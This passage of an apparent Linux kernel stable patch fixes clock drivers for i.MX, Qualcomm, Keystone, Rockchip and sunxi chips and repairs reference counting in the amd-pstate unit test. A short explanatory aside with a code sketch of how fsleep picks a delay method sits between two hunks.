+ static const char * const imx8mp_sai5_sels[] = {"osc_24m", "audio_pll1_out", "audio_pll2_out",
+ 						"video_pll1_out", "sys_pll1_133m", "osc_hdmi",
+ 						"clk_ext2", "clk_ext3", };
+@@ -566,7 +562,6 @@ static int imx8mp_clocks_probe(struct platform_device *pdev)
+ 	hws[IMX8MP_CLK_SAI1] = imx8m_clk_hw_composite("sai1", imx8mp_sai1_sels, ccm_base + 0xa580);
+ 	hws[IMX8MP_CLK_SAI2] = imx8m_clk_hw_composite("sai2", imx8mp_sai2_sels, ccm_base + 0xa600);
+ 	hws[IMX8MP_CLK_SAI3] = imx8m_clk_hw_composite("sai3", imx8mp_sai3_sels, ccm_base + 0xa680);
+-	hws[IMX8MP_CLK_SAI4] = imx8m_clk_hw_composite("sai4", imx8mp_sai4_sels, ccm_base + 0xa700);
+ 	hws[IMX8MP_CLK_SAI5] = imx8m_clk_hw_composite("sai5", imx8mp_sai5_sels, ccm_base + 0xa780);
+ 	hws[IMX8MP_CLK_SAI6] = imx8m_clk_hw_composite("sai6", imx8mp_sai6_sels, ccm_base + 0xa800);
+ 	hws[IMX8MP_CLK_ENET_QOS] = imx8m_clk_hw_composite("enet_qos", imx8mp_enet_qos_sels, ccm_base + 0xa880);
+diff --git a/drivers/clk/imx/clk-imx8ulp.c b/drivers/clk/imx/clk-imx8ulp.c
+index ca0e4a3aa454e..fa9121b3cf36a 100644
+--- a/drivers/clk/imx/clk-imx8ulp.c
++++ b/drivers/clk/imx/clk-imx8ulp.c
+@@ -167,7 +167,7 @@ static int imx8ulp_clk_cgc1_init(struct platform_device *pdev)
+ 	clks[IMX8ULP_CLK_SPLL2_PRE_SEL]	= imx_clk_hw_mux_flags("spll2_pre_sel", base + 0x510, 0, 1, pll_pre_sels, ARRAY_SIZE(pll_pre_sels), CLK_SET_PARENT_GATE);
+ 	clks[IMX8ULP_CLK_SPLL3_PRE_SEL]	= imx_clk_hw_mux_flags("spll3_pre_sel", base + 0x610, 0, 1, pll_pre_sels, ARRAY_SIZE(pll_pre_sels), CLK_SET_PARENT_GATE);
+ 
+-	clks[IMX8ULP_CLK_SPLL2] = imx_clk_hw_pllv4(IMX_PLLV4_IMX8ULP, "spll2", "spll2_pre_sel", base + 0x500);
++	clks[IMX8ULP_CLK_SPLL2] = imx_clk_hw_pllv4(IMX_PLLV4_IMX8ULP_1GHZ, "spll2", "spll2_pre_sel", base + 0x500);
+ 	clks[IMX8ULP_CLK_SPLL3] = imx_clk_hw_pllv4(IMX_PLLV4_IMX8ULP, "spll3", "spll3_pre_sel", base + 0x600);
+ 	clks[IMX8ULP_CLK_SPLL3_VCODIV] = imx_clk_hw_divider("spll3_vcodiv", "spll3", base + 0x604, 0, 6);
+ 
+diff --git a/drivers/clk/imx/clk-pllv4.c b/drivers/clk/imx/clk-pllv4.c
+index 6e7e34571fc8d..9b136c951762c 100644
+--- a/drivers/clk/imx/clk-pllv4.c
++++ b/drivers/clk/imx/clk-pllv4.c
+@@ -44,11 +44,15 @@ struct clk_pllv4 {
+ 	u32		cfg_offset;
+ 	u32		num_offset;
+ 	u32		denom_offset;
++	bool		use_mult_range;
+ };
+ 
+ /* Valid PLL MULT Table */
+ static const int pllv4_mult_table[] = {33, 27, 22, 20, 17, 16};
+ 
++/* Valid PLL MULT range, (max, min) */
++static const int pllv4_mult_range[] = {54, 27};
++
+ #define to_clk_pllv4(__hw) container_of(__hw, struct clk_pllv4, hw)
+ 
+ #define LOCK_TIMEOUT_US		USEC_PER_MSEC
+@@ -94,17 +98,30 @@ static unsigned long clk_pllv4_recalc_rate(struct clk_hw *hw,
+ static long clk_pllv4_round_rate(struct clk_hw *hw, unsigned long rate,
+ 				 unsigned long *prate)
+ {
++	struct clk_pllv4 *pll = to_clk_pllv4(hw);
+ 	unsigned long parent_rate = *prate;
+ 	unsigned long round_rate, i;
+ 	u32 mfn, mfd = DEFAULT_MFD;
+ 	bool found = false;
+ 	u64 temp64;
+-
+-	for (i = 0; i < ARRAY_SIZE(pllv4_mult_table); i++) {
+-		round_rate = parent_rate * pllv4_mult_table[i];
+-		if (rate >= round_rate) {
++	u32 mult;
++
++	if (pll->use_mult_range) {
++		temp64 = (u64)rate;
++		do_div(temp64, parent_rate);
++		mult = temp64;
++		if (mult >= pllv4_mult_range[1] &&
++		    mult <= pllv4_mult_range[0]) {
++			round_rate = parent_rate * mult;
+ 			found = true;
+-			break;
++		}
++	} else {
++		for (i = 0; i < ARRAY_SIZE(pllv4_mult_table); i++) {
++			round_rate = parent_rate * pllv4_mult_table[i];
++			if (rate >= round_rate) {
++				found = true;
++				break;
++			}
+ 		}
+ 	}
+ 
+@@ -138,14 +155,20 @@ static long clk_pllv4_round_rate(struct clk_hw *hw, unsigned long rate,
+ 	return round_rate + (u32)temp64;
+ }
+ 
+-static bool clk_pllv4_is_valid_mult(unsigned int mult)
++static bool clk_pllv4_is_valid_mult(struct clk_pllv4 *pll, unsigned int mult)
+ {
+ 	int i;
+ 
+ 	/* check if mult is in valid MULT table */
+-	for (i = 0; i < ARRAY_SIZE(pllv4_mult_table); i++) {
+-		if (pllv4_mult_table[i] == mult)
++	if (pll->use_mult_range) {
++		if (mult >= pllv4_mult_range[1] &&
++		    mult <= pllv4_mult_range[0])
+ 			return true;
++	} else {
++		for (i = 0; i < ARRAY_SIZE(pllv4_mult_table); i++) {
++			if (pllv4_mult_table[i] == mult)
++				return true;
++		}
+ 	}
+ 
+ 	return false;
+@@ -160,7 +183,7 @@ static int clk_pllv4_set_rate(struct clk_hw *hw, unsigned long rate,
+ 
+ 	mult = rate / parent_rate;
+ 
+-	if (!clk_pllv4_is_valid_mult(mult))
++	if (!clk_pllv4_is_valid_mult(pll, mult))
+ 		return -EINVAL;
+ 
+ 	if (parent_rate <= MAX_MFD)
+@@ -227,10 +250,13 @@ struct clk_hw *imx_clk_hw_pllv4(enum imx_pllv4_type type, const char *name,
+ 
+ 	pll->base = base;
+ 
+-	if (type == IMX_PLLV4_IMX8ULP) {
++	if (type == IMX_PLLV4_IMX8ULP ||
++	    type == IMX_PLLV4_IMX8ULP_1GHZ) {
+ 		pll->cfg_offset = IMX8ULP_PLL_CFG_OFFSET;
+ 		pll->num_offset = IMX8ULP_PLL_NUM_OFFSET;
+ 		pll->denom_offset = IMX8ULP_PLL_DENOM_OFFSET;
++		if (type == IMX_PLLV4_IMX8ULP_1GHZ)
++			pll->use_mult_range = true;
+ 	} else {
+ 		pll->cfg_offset = PLL_CFG_OFFSET;
+ 		pll->num_offset = PLL_NUM_OFFSET;
+diff --git a/drivers/clk/imx/clk.h b/drivers/clk/imx/clk.h
+index dd49f90110e8b..fb59131395f03 100644
+--- a/drivers/clk/imx/clk.h
++++ b/drivers/clk/imx/clk.h
+@@ -46,6 +46,7 @@ enum imx_pll14xx_type {
+ enum imx_pllv4_type {
+ 	IMX_PLLV4_IMX7ULP,
+ 	IMX_PLLV4_IMX8ULP,
++	IMX_PLLV4_IMX8ULP_1GHZ,
+ };
+ 
+ enum imx_pfdv2_type {
+diff --git a/drivers/clk/keystone/pll.c b/drivers/clk/keystone/pll.c
+index d59a7621bb204..ee5c72369334f 100644
+--- a/drivers/clk/keystone/pll.c
++++ b/drivers/clk/keystone/pll.c
+@@ -209,7 +209,7 @@ static void __init _of_pll_clk_init(struct device_node *node, bool pllctrl)
+ 	}
+ 
+ 	clk = clk_register_pll(NULL, node->name, parent_name, pll_data);
+-	if (clk) {
++	if (!IS_ERR_OR_NULL(clk)) {
+ 		of_clk_add_provider(node, of_clk_src_simple_get, clk);
+ 		return;
+ 	}
+diff --git a/drivers/clk/qcom/gcc-sc7180.c b/drivers/clk/qcom/gcc-sc7180.c
+index 2d3980251e78e..5822db4f4f358 100644
+--- a/drivers/clk/qcom/gcc-sc7180.c
++++ b/drivers/clk/qcom/gcc-sc7180.c
+@@ -667,6 +667,7 @@ static struct clk_rcg2 gcc_sdcc2_apps_clk_src = {
+ 		.name = "gcc_sdcc2_apps_clk_src",
+ 		.parent_data = gcc_parent_data_5,
+ 		.num_parents = ARRAY_SIZE(gcc_parent_data_5),
++		.flags = CLK_OPS_PARENT_ENABLE,
+ 		.ops = &clk_rcg2_floor_ops,
+ 	},
+ };
+diff --git a/drivers/clk/qcom/gcc-sc8280xp.c b/drivers/clk/qcom/gcc-sc8280xp.c
+index b3198784e1c3d..57bbd609151cd 100644
+--- a/drivers/clk/qcom/gcc-sc8280xp.c
++++ b/drivers/clk/qcom/gcc-sc8280xp.c
+@@ -6760,7 +6760,7 @@ static struct gdsc pcie_0_tunnel_gdsc = {
+ 		.name = "pcie_0_tunnel_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
+-	.flags = VOTABLE,
++	.flags = VOTABLE | RETAIN_FF_ENABLE,
+ };
+ 
+ static struct gdsc pcie_1_tunnel_gdsc = {
+@@ -6771,7 +6771,7 @@ static struct gdsc pcie_1_tunnel_gdsc = {
+ 		.name = "pcie_1_tunnel_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
+-	.flags = VOTABLE,
++	.flags = VOTABLE | RETAIN_FF_ENABLE,
+ };
+ 
+ /*
+@@ -6786,7 +6786,7 @@ static struct gdsc pcie_2a_gdsc = {
+ 		.name = "pcie_2a_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
+-	.flags = VOTABLE | ALWAYS_ON,
++	.flags = VOTABLE | RETAIN_FF_ENABLE | ALWAYS_ON,
+ };
+ 
+ static struct gdsc pcie_2b_gdsc = {
+@@ -6797,7 +6797,7 @@ static struct gdsc pcie_2b_gdsc = {
+ 		.name = "pcie_2b_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
+-	.flags = VOTABLE | ALWAYS_ON,
++	.flags = VOTABLE | RETAIN_FF_ENABLE | ALWAYS_ON,
+ };
+ 
+ static struct gdsc pcie_3a_gdsc = {
+@@ -6808,7 +6808,7 @@ static struct gdsc pcie_3a_gdsc = {
+ 		.name = "pcie_3a_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
+-	.flags = VOTABLE | ALWAYS_ON,
++	.flags = VOTABLE | RETAIN_FF_ENABLE | ALWAYS_ON,
+ };
+ 
+ static struct gdsc pcie_3b_gdsc = {
+@@ -6819,7 +6819,7 @@ static struct gdsc pcie_3b_gdsc = {
+ 		.name = "pcie_3b_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
+-	.flags = VOTABLE | ALWAYS_ON,
++	.flags = VOTABLE | RETAIN_FF_ENABLE | ALWAYS_ON,
+ };
+ 
+ static struct gdsc pcie_4_gdsc = {
+@@ -6830,7 +6830,7 @@ static struct gdsc pcie_4_gdsc = {
+ 		.name = "pcie_4_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
+-	.flags = VOTABLE | ALWAYS_ON,
++	.flags = VOTABLE | RETAIN_FF_ENABLE | ALWAYS_ON,
+ };
+ 
+ static struct gdsc ufs_card_gdsc = {
+@@ -6839,6 +6839,7 @@ static struct gdsc ufs_card_gdsc = {
+ 		.name = "ufs_card_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.flags = RETAIN_FF_ENABLE,
+ };
+ 
+ static struct gdsc ufs_phy_gdsc = {
+@@ -6847,6 +6848,7 @@ static struct gdsc ufs_phy_gdsc = {
+ 		.name = "ufs_phy_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.flags = RETAIN_FF_ENABLE,
+ };
+ 
+ static struct gdsc usb30_mp_gdsc = {
+@@ -6855,6 +6857,7 @@ static struct gdsc usb30_mp_gdsc = {
+ 		.name = "usb30_mp_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_RET_ON,
++	.flags = RETAIN_FF_ENABLE,
+ };
+ 
+ static struct gdsc usb30_prim_gdsc = {
+@@ -6863,6 +6866,7 @@ static struct gdsc usb30_prim_gdsc = {
+ 		.name = "usb30_prim_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_RET_ON,
++	.flags = RETAIN_FF_ENABLE,
+ };
+ 
+ static struct gdsc usb30_sec_gdsc = {
+@@ -6871,6 +6875,115 @@ static struct gdsc usb30_sec_gdsc = {
+ 		.name = "usb30_sec_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_RET_ON,
++	.flags = RETAIN_FF_ENABLE,
++};
++
++static struct gdsc emac_0_gdsc = {
++	.gdscr = 0xaa004,
++	.pd = {
++		.name = "emac_0_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = RETAIN_FF_ENABLE,
++};
++
++static struct gdsc emac_1_gdsc = {
++	.gdscr = 0xba004,
++	.pd = {
++		.name = "emac_1_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = RETAIN_FF_ENABLE,
++};
++
++static struct gdsc usb4_1_gdsc = {
++	.gdscr = 0xb8004,
++	.pd = {
++		.name = "usb4_1_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = RETAIN_FF_ENABLE,
++};
++
++static struct gdsc usb4_gdsc = {
++	.gdscr = 0x2a004,
++	.pd = {
++		.name = "usb4_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = RETAIN_FF_ENABLE,
++};
++
++static struct gdsc hlos1_vote_mmnoc_mmu_tbu_hf0_gdsc = {
++	.gdscr = 0x7d050,
++	.pd = {
++		.name = "hlos1_vote_mmnoc_mmu_tbu_hf0_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = VOTABLE,
++};
++
++static struct gdsc hlos1_vote_mmnoc_mmu_tbu_hf1_gdsc = {
++	.gdscr = 0x7d058,
++	.pd = {
++		.name = "hlos1_vote_mmnoc_mmu_tbu_hf1_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = VOTABLE,
++};
++
++static struct gdsc hlos1_vote_mmnoc_mmu_tbu_sf0_gdsc = {
++	.gdscr = 0x7d054,
++	.pd = {
++		.name = "hlos1_vote_mmnoc_mmu_tbu_sf0_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = VOTABLE,
++};
++
++static struct gdsc hlos1_vote_mmnoc_mmu_tbu_sf1_gdsc = {
++	.gdscr = 0x7d06c,
++	.pd = {
++		.name = "hlos1_vote_mmnoc_mmu_tbu_sf1_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = VOTABLE,
++};
++
++static struct gdsc hlos1_vote_turing_mmu_tbu0_gdsc = {
++	.gdscr = 0x7d05c,
++	.pd = {
++		.name = "hlos1_vote_turing_mmu_tbu0_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = VOTABLE,
++};
++
++static struct gdsc hlos1_vote_turing_mmu_tbu1_gdsc = {
++	.gdscr = 0x7d060,
++	.pd = {
++		.name = "hlos1_vote_turing_mmu_tbu1_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = VOTABLE,
++};
++
++static struct gdsc hlos1_vote_turing_mmu_tbu2_gdsc = {
++	.gdscr = 0x7d0a0,
++	.pd = {
++		.name = "hlos1_vote_turing_mmu_tbu2_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = VOTABLE,
++};
++
++static struct gdsc hlos1_vote_turing_mmu_tbu3_gdsc = {
++	.gdscr = 0x7d0a4,
++	.pd = {
++		.name = "hlos1_vote_turing_mmu_tbu3_gdsc",
++	},
++	.pwrsts = PWRSTS_OFF_ON,
++	.flags = VOTABLE,
+ };
+ 
+ static struct clk_regmap *gcc_sc8280xp_clocks[] = {
+@@ -7351,6 +7464,18 @@ static struct gdsc *gcc_sc8280xp_gdscs[] = {
+ 	[USB30_MP_GDSC] = &usb30_mp_gdsc,
+ 	[USB30_PRIM_GDSC] = &usb30_prim_gdsc,
+ 	[USB30_SEC_GDSC] = &usb30_sec_gdsc,
++	[EMAC_0_GDSC] = &emac_0_gdsc,
++	[EMAC_1_GDSC] = &emac_1_gdsc,
++	[USB4_1_GDSC] = &usb4_1_gdsc,
++	[USB4_GDSC] = &usb4_gdsc,
++	[HLOS1_VOTE_MMNOC_MMU_TBU_HF0_GDSC] = &hlos1_vote_mmnoc_mmu_tbu_hf0_gdsc,
++	[HLOS1_VOTE_MMNOC_MMU_TBU_HF1_GDSC] = &hlos1_vote_mmnoc_mmu_tbu_hf1_gdsc,
++	[HLOS1_VOTE_MMNOC_MMU_TBU_SF0_GDSC] = &hlos1_vote_mmnoc_mmu_tbu_sf0_gdsc,
++	[HLOS1_VOTE_MMNOC_MMU_TBU_SF1_GDSC] = &hlos1_vote_mmnoc_mmu_tbu_sf1_gdsc,
++	[HLOS1_VOTE_TURING_MMU_TBU0_GDSC] = &hlos1_vote_turing_mmu_tbu0_gdsc,
++	[HLOS1_VOTE_TURING_MMU_TBU1_GDSC] = &hlos1_vote_turing_mmu_tbu1_gdsc,
++	[HLOS1_VOTE_TURING_MMU_TBU2_GDSC] = &hlos1_vote_turing_mmu_tbu2_gdsc,
++	[HLOS1_VOTE_TURING_MMU_TBU3_GDSC] = &hlos1_vote_turing_mmu_tbu3_gdsc,
+ };
+ 
+ static const struct clk_rcg_dfs_data gcc_dfs_clocks[] = {
+diff --git a/drivers/clk/qcom/gcc-sm6350.c b/drivers/clk/qcom/gcc-sm6350.c
+index 9b4e4bb059635..cf4a7b6e0b23a 100644
+--- a/drivers/clk/qcom/gcc-sm6350.c
++++ b/drivers/clk/qcom/gcc-sm6350.c
+@@ -641,6 +641,7 @@ static struct clk_rcg2 gcc_sdcc2_apps_clk_src = {
+ 		.name = "gcc_sdcc2_apps_clk_src",
+ 		.parent_data = gcc_parent_data_8,
+ 		.num_parents = ARRAY_SIZE(gcc_parent_data_8),
++		.flags = CLK_OPS_PARENT_ENABLE,
+ 		.ops = &clk_rcg2_floor_ops,
+ 	},
+ };
+diff --git a/drivers/clk/qcom/gcc-sm8250.c b/drivers/clk/qcom/gcc-sm8250.c
+index a0ba37656b07b..30bd561461074 100644
+--- a/drivers/clk/qcom/gcc-sm8250.c
++++ b/drivers/clk/qcom/gcc-sm8250.c
+@@ -721,6 +721,7 @@ static struct clk_rcg2 gcc_sdcc2_apps_clk_src = {
+ 		.name = "gcc_sdcc2_apps_clk_src",
+ 		.parent_data = gcc_parent_data_4,
+ 		.num_parents = ARRAY_SIZE(gcc_parent_data_4),
++		.flags = CLK_OPS_PARENT_ENABLE,
+ 		.ops = &clk_rcg2_floor_ops,
+ 	},
+ };
+diff --git a/drivers/clk/qcom/gcc-sm8450.c b/drivers/clk/qcom/gcc-sm8450.c
+index 666efa5ff9780..59c567e76d656 100644
+--- a/drivers/clk/qcom/gcc-sm8450.c
++++ b/drivers/clk/qcom/gcc-sm8450.c
+@@ -904,7 +904,7 @@ static struct clk_rcg2 gcc_sdcc2_apps_clk_src = {
+ 		.parent_data = gcc_parent_data_7,
+ 		.num_parents = ARRAY_SIZE(gcc_parent_data_7),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_floor_ops,
+ 	},
+ };
+ 
+@@ -926,7 +926,7 @@ static struct clk_rcg2 gcc_sdcc4_apps_clk_src = {
+ 		.parent_data = gcc_parent_data_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parent_data_0),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_floor_ops,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/qcom/gpucc-sm6350.c b/drivers/clk/qcom/gpucc-sm6350.c
+index ef15185a99c31..0bcbba2a29436 100644
+--- a/drivers/clk/qcom/gpucc-sm6350.c
++++ b/drivers/clk/qcom/gpucc-sm6350.c
+@@ -24,6 +24,12 @@
+ #define CX_GMU_CBCR_WAKE_MASK		0xF
+ #define CX_GMU_CBCR_WAKE_SHIFT		8
+ 
++enum {
++	DT_BI_TCXO,
++	DT_GPLL0_OUT_MAIN,
++	DT_GPLL0_OUT_MAIN_DIV,
++};
++
+ enum {
+ 	P_BI_TCXO,
+ 	P_GPLL0_OUT_MAIN,
+@@ -61,6 +67,7 @@ static struct clk_alpha_pll gpu_cc_pll0 = {
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gpu_cc_pll0",
+ 			.parent_data =  &(const struct clk_parent_data){
++				.index = DT_BI_TCXO,
+ 				.fw_name = "bi_tcxo",
+ 			},
+ 			.num_parents = 1,
+@@ -104,6 +111,7 @@ static struct clk_alpha_pll gpu_cc_pll1 = {
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gpu_cc_pll1",
+ 			.parent_data =  &(const struct clk_parent_data){
++				.index = DT_BI_TCXO,
+ 				.fw_name = "bi_tcxo",
+ 			},
+ 			.num_parents = 1,
+@@ -121,11 +129,11 @@ static const struct parent_map gpu_cc_parent_map_0[] = {
+ };
+ 
+ static const struct clk_parent_data gpu_cc_parent_data_0[] = {
+-	{ .fw_name = "bi_tcxo" },
++	{ .index = DT_BI_TCXO, .fw_name = "bi_tcxo" },
+ 	{ .hw = &gpu_cc_pll0.clkr.hw },
+ 	{ .hw = &gpu_cc_pll1.clkr.hw },
+-	{ .fw_name = "gcc_gpu_gpll0_clk" },
+-	{ .fw_name = "gcc_gpu_gpll0_div_clk" },
++	{ .index = DT_GPLL0_OUT_MAIN, .fw_name = "gcc_gpu_gpll0_clk_src" },
++	{ .index = DT_GPLL0_OUT_MAIN_DIV, .fw_name = "gcc_gpu_gpll0_div_clk_src" },
+ };
+ 
+ static const struct parent_map gpu_cc_parent_map_1[] = {
+@@ -138,12 +146,12 @@ static const struct parent_map gpu_cc_parent_map_1[] = {
+ };
+ 
+ static const struct clk_parent_data gpu_cc_parent_data_1[] = {
+-	{ .fw_name = "bi_tcxo" },
++	{ .index = DT_BI_TCXO, .fw_name = "bi_tcxo" },
+ 	{ .hw = &crc_div.hw },
+ 	{ .hw = &gpu_cc_pll0.clkr.hw },
+ 	{ .hw = &gpu_cc_pll1.clkr.hw },
+ 	{ .hw = &gpu_cc_pll1.clkr.hw },
+-	{ .fw_name = "gcc_gpu_gpll0_clk" },
++	{ .index = DT_GPLL0_OUT_MAIN, .fw_name = "gcc_gpu_gpll0_clk_src" },
+ };
+ 
+ static const struct freq_tbl ftbl_gpu_cc_gmu_clk_src[] = {
+diff --git a/drivers/clk/qcom/reset.c b/drivers/clk/qcom/reset.c
+index 0e914ec7aeae1..e45e32804d2c7 100644
+--- a/drivers/clk/qcom/reset.c
++++ b/drivers/clk/qcom/reset.c
+@@ -16,7 +16,8 @@ static int qcom_reset(struct reset_controller_dev *rcdev, unsigned long id)
+ 	struct qcom_reset_controller *rst = to_qcom_reset_controller(rcdev);
+ 
+ 	rcdev->ops->assert(rcdev, id);
+-	udelay(rst->reset_map[id].udelay ?: 1); /* use 1 us as default */
++	fsleep(rst->reset_map[id].udelay ?: 1); /* use 1 us as default */
++
+ 	rcdev->ops->deassert(rcdev, id);
+ 	return 0;
+ }
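
fsleep() replaces udelay() above so that large per-reset delays from the reset map sleep instead of busy-waiting. Roughly, it picks a delay primitive by duration; the sketch below approximates that behaviour and is not the kernel implementation:

#include <linux/delay.h>
#include <linux/math.h>

static void fsleep_like(unsigned long usecs)
{
	if (usecs <= 10)
		udelay(usecs);			/* too short to sleep */
	else if (usecs <= 20000)
		usleep_range(usecs, 2 * usecs);	/* hrtimer-based sleep */
	else
		msleep(DIV_ROUND_UP(usecs, 1000));
}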
+diff --git a/drivers/clk/rockchip/clk-rk3568.c b/drivers/clk/rockchip/clk-rk3568.c
+index f85902e2590c7..2f54f630c8b65 100644
+--- a/drivers/clk/rockchip/clk-rk3568.c
++++ b/drivers/clk/rockchip/clk-rk3568.c
+@@ -81,7 +81,7 @@ static struct rockchip_pll_rate_table rk3568_pll_rates[] = {
+ 	RK3036_PLL_RATE(108000000, 2, 45, 5, 1, 1, 0),
+ 	RK3036_PLL_RATE(100000000, 1, 150, 6, 6, 1, 0),
+ 	RK3036_PLL_RATE(96000000, 1, 96, 6, 4, 1, 0),
+-	RK3036_PLL_RATE(78750000, 1, 96, 6, 4, 1, 0),
++	RK3036_PLL_RATE(78750000, 4, 315, 6, 4, 1, 0),
+ 	RK3036_PLL_RATE(74250000, 2, 99, 4, 4, 1, 0),
+ 	{ /* sentinel */ },
+ };
+diff --git a/drivers/clk/sunxi-ng/ccu_mmc_timing.c b/drivers/clk/sunxi-ng/ccu_mmc_timing.c
+index de33414fc5c28..c6a6ce98ca03a 100644
+--- a/drivers/clk/sunxi-ng/ccu_mmc_timing.c
++++ b/drivers/clk/sunxi-ng/ccu_mmc_timing.c
+@@ -43,7 +43,7 @@ int sunxi_ccu_set_mmc_timing_mode(struct clk *clk, bool new_mode)
+ EXPORT_SYMBOL_GPL(sunxi_ccu_set_mmc_timing_mode);
+ 
+ /**
+- * sunxi_ccu_set_mmc_timing_mode: Get the current MMC clock timing mode
++ * sunxi_ccu_get_mmc_timing_mode: Get the current MMC clock timing mode
+  * @clk: clock to query
+  *
+  * Returns 0 if the clock is in old timing mode, > 0 if it is in
+diff --git a/drivers/cpufreq/amd-pstate-ut.c b/drivers/cpufreq/amd-pstate-ut.c
+index e4a5b4d90f833..b448c8d6a16dd 100644
+--- a/drivers/cpufreq/amd-pstate-ut.c
++++ b/drivers/cpufreq/amd-pstate-ut.c
+@@ -64,27 +64,9 @@ static struct amd_pstate_ut_struct amd_pstate_ut_cases[] = {
+ static bool get_shared_mem(void)
+ {
+ 	bool result = false;
+-	char path[] = "/sys/module/amd_pstate/parameters/shared_mem";
+-	char buf[5] = {0};
+-	struct file *filp = NULL;
+-	loff_t pos = 0;
+-	ssize_t ret;
+-
+-	if (!boot_cpu_has(X86_FEATURE_CPPC)) {
+-		filp = filp_open(path, O_RDONLY, 0);
+-		if (IS_ERR(filp))
+-			pr_err("%s unable to open %s file!\n", __func__, path);
+-		else {
+-			ret = kernel_read(filp, &buf, sizeof(buf), &pos);
+-			if (ret < 0)
+-				pr_err("%s read %s file fail ret=%ld!\n",
+-					__func__, path, (long)ret);
+-			filp_close(filp, NULL);
+-		}
+ 
+-		if ('Y' == *buf)
+-			result = true;
+-	}
++	if (!boot_cpu_has(X86_FEATURE_CPPC))
++		result = true;
+ 
+ 	return result;
+ }
+@@ -158,7 +140,7 @@ static void amd_pstate_ut_check_perf(u32 index)
+ 			if (ret) {
+ 				amd_pstate_ut_cases[index].result = AMD_PSTATE_UT_RESULT_FAIL;
+ 				pr_err("%s cppc_get_perf_caps ret=%d error!\n", __func__, ret);
+-				return;
++				goto skip_test;
+ 			}
+ 
+ 			nominal_perf = cppc_perf.nominal_perf;
+@@ -169,7 +151,7 @@ static void amd_pstate_ut_check_perf(u32 index)
+ 			if (ret) {
+ 				amd_pstate_ut_cases[index].result = AMD_PSTATE_UT_RESULT_FAIL;
+ 				pr_err("%s read CPPC_CAP1 ret=%d error!\n", __func__, ret);
+-				return;
++				goto skip_test;
+ 			}
+ 
+ 			nominal_perf = AMD_CPPC_NOMINAL_PERF(cap1);
+@@ -187,7 +169,7 @@ static void amd_pstate_ut_check_perf(u32 index)
+ 				nominal_perf, cpudata->nominal_perf,
+ 				lowest_nonlinear_perf, cpudata->lowest_nonlinear_perf,
+ 				lowest_perf, cpudata->lowest_perf);
+-			return;
++			goto skip_test;
+ 		}
+ 
+ 		if (!((highest_perf >= nominal_perf) &&
+@@ -198,11 +180,15 @@ static void amd_pstate_ut_check_perf(u32 index)
+ 			pr_err("%s cpu%d highest=%d >= nominal=%d > lowest_nonlinear=%d > lowest=%d > 0, the formula is incorrect!\n",
+ 				__func__, cpu, highest_perf, nominal_perf,
+ 				lowest_nonlinear_perf, lowest_perf);
+-			return;
++			goto skip_test;
+ 		}
++		cpufreq_cpu_put(policy);
+ 	}
+ 
+ 	amd_pstate_ut_cases[index].result = AMD_PSTATE_UT_RESULT_PASS;
++	return;
++skip_test:
++	cpufreq_cpu_put(policy);
+ }
+ 
+ /*
+@@ -230,14 +216,14 @@ static void amd_pstate_ut_check_freq(u32 index)
+ 			pr_err("%s cpu%d max=%d >= nominal=%d > lowest_nonlinear=%d > min=%d > 0, the formula is incorrect!\n",
+ 				__func__, cpu, cpudata->max_freq, cpudata->nominal_freq,
+ 				cpudata->lowest_nonlinear_freq, cpudata->min_freq);
+-			return;
++			goto skip_test;
+ 		}
+ 
+ 		if (cpudata->min_freq != policy->min) {
+ 			amd_pstate_ut_cases[index].result = AMD_PSTATE_UT_RESULT_FAIL;
+ 			pr_err("%s cpu%d cpudata_min_freq=%d policy_min=%d, they should be equal!\n",
+ 				__func__, cpu, cpudata->min_freq, policy->min);
+-			return;
++			goto skip_test;
+ 		}
+ 
+ 		if (cpudata->boost_supported) {
+@@ -249,16 +235,20 @@ static void amd_pstate_ut_check_freq(u32 index)
+ 				pr_err("%s cpu%d policy_max=%d should be equal cpu_max=%d or cpu_nominal=%d !\n",
+ 					__func__, cpu, policy->max, cpudata->max_freq,
+ 					cpudata->nominal_freq);
+-				return;
++				goto skip_test;
+ 			}
+ 		} else {
+ 			amd_pstate_ut_cases[index].result = AMD_PSTATE_UT_RESULT_FAIL;
+ 			pr_err("%s cpu%d must support boost!\n", __func__, cpu);
+-			return;
++			goto skip_test;
+ 		}
++		cpufreq_cpu_put(policy);
+ 	}
+ 
+ 	amd_pstate_ut_cases[index].result = AMD_PSTATE_UT_RESULT_PASS;
++	return;
++skip_test:
++	cpufreq_cpu_put(policy);
+ }
+ 
+ static int __init amd_pstate_ut_init(void)
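
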